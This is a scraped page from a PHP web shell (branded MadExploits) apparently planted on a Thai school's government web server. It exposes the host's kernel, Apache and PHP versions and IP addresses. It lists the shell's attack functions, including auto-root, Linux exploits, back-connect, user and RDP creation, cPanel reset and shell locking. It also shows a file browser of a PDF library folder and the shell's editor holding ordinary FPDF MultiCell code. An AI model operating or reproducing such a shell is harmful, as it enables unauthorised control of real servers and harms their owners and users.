Linux ns8.secondary29.go.th 2.6.32-754.28.1.el6.x86_64 #1 SMP Wed Mar 11 18:38:45 UTC 2020 x86_64
Apache/2.2.15 (CentOS)
: 122.154.134.11 | : 122.154.134.9
Cant Read [ /etc/named.conf ]
5.6.40
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
amss /
pdf /
[ HOME SHELL ]
Name
Size
Permission
Action
doc
[ DIR ]
drwxr-xr-x
font
[ DIR ]
drwxr-xr-x
makefont
[ DIR ]
drwxr-xr-x
tutorial
[ DIR ]
drwxr-xr-x
.htaccess
30
B
-rwxr-xr-x
FAQ.htm
10.87
KB
-rw-r--r--
_display.php
288
B
-rw-r--r--
changelog.htm
8.83
KB
-rw-r--r--
class.multicelltag.php
20.35
KB
-rw-r--r--
class.string_tags.php
5.58
KB
-rw-r--r--
display.php
8.35
KB
-rw-r--r--
fpdf(OLD).php
44.02
KB
-rwxr-xr-x
fpdf.css
1.31
KB
-rw-r--r--
fpdf.php
52.5
KB
-rw-r--r--
fpdf__30-09-61.php
44.02
KB
-rwxr-xr-x
install.txt
547
B
-rw-r--r--
krut.png
44.46
KB
-rw-r--r--
license.txt
326
B
-rw-r--r--
mc_indent.php
3.67
KB
-rw-r--r--
แจ้งผลการต...
257.48
KB
-rw-r--r--
駼šõǨͺ˹ѧӤѭ...
257.48
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : mc_indent.php
<?php require('fpdf.php'); class PDF extends FPDF { function MultiCell($w, $h, $txt, $border=0, $align='J', $fill=false, $indent=0) { //Output text with automatic or explicit line breaks $cw=&$this->CurrentFont['cw']; if($w==0) $w=$this->w-$this->rMargin-$this->x; $wFirst = $w-$indent; $wOther = $w; $wmaxFirst=($wFirst-2*$this->cMargin)*1000/$this->FontSize; $wmaxOther=($wOther-2*$this->cMargin)*1000/$this->FontSize; $s=str_replace("\r",'',$txt); $nb=strlen($s); if($nb>0 && $s[$nb-1]=="\n") $nb--; $b=0; if($border) { if($border==1) { $border='LTRB'; $b='LRT'; $b2='LR'; } else { $b2=''; if(is_int(strpos($border,'L'))) $b2.='L'; if(is_int(strpos($border,'R'))) $b2.='R'; $b=is_int(strpos($border,'T')) ? $b2.'T' : $b2; } } $sep=-1; $i=0; $j=0; $l=0; $ns=0; $nl=1; $first=true; while($i<$nb) { //Get next character $c=$s[$i]; if($c=="\n") { //Explicit line break if($this->ws>0) { $this->ws=0; $this->_out('0 Tw'); } $this->Cell($w,$h,substr($s,$j,$i-$j),$b,2,$align,$fill); $i++; $sep=-1; $j=$i; $l=0; $ns=0; $nl++; if($border && $nl==2) $b=$b2; continue; } if($c==' ') { $sep=$i; $ls=$l; $ns++; } $l+=$cw[$c]; if ($first) { $wmax = $wmaxFirst; $w = $wFirst; } else { $wmax = $wmaxOther; $w = $wOther; } if($l>$wmax) { //Automatic line break if($sep==-1) { if($i==$j) $i++; if($this->ws>0) { $this->ws=0; $this->_out('0 Tw'); } $SaveX = $this->x; if ($first && $indent>0) { $this->SetX($this->x + $indent); $first=false; } $this->Cell($w,$h,substr($s,$j,$i-$j),$b,2,$align,$fill); $this->SetX($SaveX); } else { if($align=='J') { $this->ws=($ns>1) ? ($wmax-$ls)/1000*$this->FontSize/($ns-1) : 0; $this->_out(sprintf('%.3f Tw',$this->ws*$this->k)); } $SaveX = $this->x; if ($first && $indent>0) { $this->SetX($this->x + $indent); $first=false; } $this->Cell($w,$h,substr($s,$j,$sep-$j),$b,2,$align,$fill); $this->SetX($SaveX); $i=$sep+1; } $sep=-1; $j=$i; $l=0; $ns=0; $nl++; if($border && $nl==2) $b=$b2; } else $i++; } //Last chunk if($this->ws>0) { $this->ws=0; $this->_out('0 Tw'); } if($border && is_int(strpos($border,'B'))) $b.='B'; $this->Cell($w,$h,substr($s,$j,$i),$b,2,$align,$fill); $this->x=$this->lMargin; } } ?>
Close